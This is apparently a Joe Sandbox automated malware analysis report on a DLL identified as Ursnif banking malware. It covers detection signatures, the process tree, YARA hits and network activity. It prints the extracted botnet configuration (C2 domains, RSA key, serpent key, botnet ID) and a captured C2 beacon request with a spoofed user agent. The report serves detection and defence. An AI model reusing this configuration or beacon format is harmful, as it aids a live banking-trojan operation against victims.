Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 616412739e268.dll

Overview

General Information

Sample Name:616412739e268.dll
Analysis ID:500413
MD5:9e67e68ddbedba865b91b5469ab642ef
SHA1:f2c7b0735343081be06e48616d0fc14235a28744
SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
Tags:brtdllgoziisfbursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7088 cmdline: loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 5724 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4432 cmdline: rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6084 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6140 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6012 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4360 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 29 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.loaddll32.exe.2d494a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              10.3.rundll32.exe.10ba31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                5.3.rundll32.exe.10da31a.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  6.3.rundll32.exe.318a31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    6.2.rundll32.exe.6e8d0000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 616412739e268.dllReversingLabs: Detection: 24%
                      Source: 616412739e268.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49759 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49783 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49816 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49820 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49821 version: TLS 1.2
                      Source: 616412739e268.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb7 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb.{Y@e source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbf{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbl{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb/ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000012.00000002.529162256.0000000002F92000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.551332599.0000000000632000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: winspool.pdb6{1@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb0{?@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb({G@r source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb0 source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000016.00000003.516470114.0000000004CA2000.00000004.00000001.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbn source: WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbQ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbA source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb<{K@a source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb9 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb[ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000002.00000002.682655563.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.683978405.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.548616295.000000006E94B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: msctf.pdb# source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb% source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000018.00000003.521770649.000000000090B000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: sfc.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: msctf.pdb"{M@C source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.98.207.210 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.60.226 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187Jump to behavior
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewIP Address: 40.97.161.50 40.97.161.50
                      Source: Joe Sandbox ViewIP Address: 13.82.28.61 13.82.28.61
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
